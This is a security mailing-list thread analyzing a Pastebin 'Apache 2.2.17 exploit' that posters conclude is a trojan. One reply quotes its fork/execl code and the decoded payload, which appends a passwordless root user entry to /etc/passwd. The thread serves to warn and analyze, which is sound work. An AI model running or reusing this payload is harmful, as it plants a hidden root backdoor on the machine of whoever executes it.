[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Apache 2.2.17 exploit?
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Apache 2.2.17 exploit?
- From: Security Mailing List <s3clist@xxxxxxxxxxx>
- Date: Mon, 3 Oct 2011 23:13:53 +0800
Yeah, sure it is.
1.
if (fork() == 0)
2.
execl("/bin/sh", "sh", "-c", evil, 0);
3.
else
4.
wait(NULL);
This line shows that the code will run "/bin/sh" on local machine and it
has evil[] as a parameter. By decoding evil[], I can get
"?*^1??F??F??FG?vI?^??^M?^??^Q?FU?????NI?VU???????/bin/sh#-c#/bin/echo
w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"
The illegible characters before the first "/bin/sh" could be an assembly
code intended to do evil thing on the local machine. I have not tested
but I assume that it would add a user to a machine that runs this code :D
On 10/4/2011 12:32 AM, Laurelai wrote:
> On 10/3/2011 7:31 AM, Darren Martyn wrote:
>> I regularly trawl Pastebin.com to find code - often idiots leave some
>> 0day and similar there and it is nice to find.
>>
>> Well, seeing as I have no test boxes at the moment, can someone check
>> this code in a VM? I am not sure if it is legit or not.
>>
>> http://pastebin.com/ygByEV2e
>>
>> Thanks :)
>>
>> ~Darren
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> Pretty sure its a trojan.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/